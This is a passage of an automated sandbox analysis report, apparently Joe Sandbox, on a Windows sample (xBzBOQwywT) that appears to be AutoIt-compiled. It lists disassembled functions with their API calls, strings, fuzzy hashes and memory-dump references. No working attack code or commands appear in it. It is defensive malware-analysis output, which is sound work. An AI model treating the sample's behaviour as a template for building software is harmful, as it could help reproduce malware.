                                                                        Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                        • Opcode Fuzzy Hash: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                        Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                        • _fseek.LIBCMT ref: 00452B3B
                                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                                        • _wcscat.LIBCMT ref: 00452C07
                                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                        • String ID:
                                                                        • API String ID: 2054058615-0
                                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                        Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID: 0
                                                                        • API String ID: 2353593579-4108050209
                                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                        Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                        • String ID:
                                                                        • API String ID: 1744303182-0
                                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                        Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                        • __mtterm.LIBCMT ref: 00417C34
                                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 4163708885-3819984048
                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                        Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                        • API String ID: 0-1896584978
                                                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                        Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2485277191-404129466
                                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                        Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                        Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00464B28
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                        • _wcslen.LIBCMT ref: 00464C28
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                                        • String ID: D
                                                                        • API String ID: 1914653954-2746444292
                                                                        • Opcode ID: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                        • Opcode Fuzzy Hash: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                        Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                        • String ID: *.*
                                                                        • API String ID: 1153243558-438819550
                                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                        Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll
                                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                        • API String ID: 3832890014-4202584635
                                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                        Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$CtrlFocus
                                                                        • String ID: 0
                                                                        • API String ID: 1534620443-4108050209
